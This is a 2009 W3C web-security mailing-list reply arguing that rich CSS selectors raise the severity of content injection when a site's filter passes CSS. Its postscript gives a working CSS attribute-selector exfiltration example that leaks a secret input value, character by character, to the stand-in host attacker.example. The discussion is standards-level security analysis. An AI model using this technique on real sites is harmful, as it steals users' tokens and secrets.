- From: Adam Barth <w3c@adambarth.com>
- Date: Sun, 6 Dec 2009 08:22:37 -0800
- To: Ian Hickson <ian@hixie.ch>
- Cc: Maciej Stachowiak <mjs@apple.com>, sird@rckc.at, public-web-security@w3.org
On Sun, Dec 6, 2009 at 1:21 AM, Ian Hickson <ian@hixie.ch> wrote:
> On Sat, 5 Dec 2009, Adam Barth wrote:
>> I think you're missing the main attack that sird's worried about:
>>
>> Assumptions:
>>
>> 1) The attacker can inject content into the target web site, but
>> cannot inject script.
>
> If you grant the assumption that the page has a faulty filter, IMHO it
> becomes easy to have all kinds of vulnerabilities. That filters should
> make sure the user can't insert arbitrary CSS is not new. Selectors and
> expressions get more and more expressive with each year, but they pale
> in comparison to the kind of deep analysis you can do to a page using
> XSLT and XPath, for example. This is why filters should always
> whitelist only features they consider safe.

The issue is slightly more subtle than you describe. Filters aren't
"faulty" or "safe"; they just restrict what kinds of things the attacker
can inject. The question is what bad things the attacker can do with
those injections. sird's point is that allowing CSS is more severe than
it used to be (modulo expression() and -moz-binding, which are generally
considered poor features from a security point of view).

Imagine all the sites on the web as regions on a map, colored by the
severity of the bad things an attacker can do on each site, even when
restricted by its filter. Some percentage of the map has unrestricted
XSS and is bright red. Some percentage is locked down to allowing only
the letter "a" and is bright green. The point is that this feature turns
some non-negligible percentage of the map a brighter shade of red.
That's something we should know about and balance against the
functionality we gain by adding this attack surface.

Adam
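P.S. To make "more severe than it used to be" concrete, here is a
minimal sketch of the kind of selector-based leak that needs no
expression() or -moz-binding at all. It assumes the attacker can inject
a <style> block (content, not script) into a page that carries a secret
in an attribute value; the element, the id, and the attacker.example
host below are all hypothetical:

    /* Assumed target markup: <input id="token" value="...">.   */
    /* Each rule matches only if the secret starts with that    */
    /* character, and a match fires a request to the attacker.  */
    input#token[value^="a"] { background: url(//attacker.example/leak?p=a); }
    input#token[value^="b"] { background: url(//attacker.example/leak?p=b); }
    /* ...one rule per candidate character. The rule that fires
       reveals the first character; repeating with two-character
       prefixes ("aa", "ab", ...) extracts the rest. */

No script ever runs in the page; the style engine does the work, which
is exactly why a filter that blocks <script> but passes CSS through has
not actually closed the hole.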
Received on Sunday, 6 December 2009 16:23:40 UTC